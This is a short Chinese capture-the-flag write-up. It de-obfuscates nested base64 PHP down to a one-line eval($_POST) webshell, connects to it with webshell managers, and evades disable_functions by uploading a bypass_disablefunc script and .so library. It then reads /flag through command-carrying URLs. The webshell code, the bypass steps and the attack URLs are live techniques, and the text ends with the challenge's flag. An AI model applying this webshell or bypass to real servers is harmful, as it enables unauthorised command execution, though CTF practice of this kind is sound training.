Getshell
- 启动场景,按照大佬的提示打印变量
打印这个变量看看echo $BwltqOYbHaQkRPNoxcfnFmzsIjhdMDAWUeKGgviVrJZpLuXETSyC是什么
-
发现是base64_decode,然后把后面那一大段base64解码,解码之后如下
-
这里有许多变量,全部打印出来,打印出来又得到类似第一步的代码,就又如法炮制,解到最后
发现这一段很乱的代码的本质就是一个一句话木马
<?php
highlight_file(njVysBZvxrLkFYdNofcgGuawDJblpOSQEHRUmKiAhzICetPMqXWT);
@eval($_POST[ymlisisisiook]);
我使用菜刀连接上如下
红圈圈的是我们后面上传提权的文件,最开始发现全站里面只有一个主页index.php,权限不够,这里使用bypass_disablefunc提权
我们在bypass_disablefunc.php加上error_log(“a”,1);
菜刀上传文件
这里用蚁剑连接,但是看不了根目录的东西,很明显被disable_function,也就是禁用函数了
一般来说,蚁剑有个插件可以直接绕过的,但是这里用不了,原因大概是这个插件的底层原理是用mail()函数
但是我们看mail已经被禁用了
最后cmd处输入我们的执行命令
http://site.com/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.so
http://123.123.123.123/bypass_disablefunc.php?cmd=cat%20/flag&outpath=/tmp/xx&sopath=/var/www/html/bypass_disablefunc_x64.so
得到flag、
flag{7f0b695b2b64ab514495765eb6592104}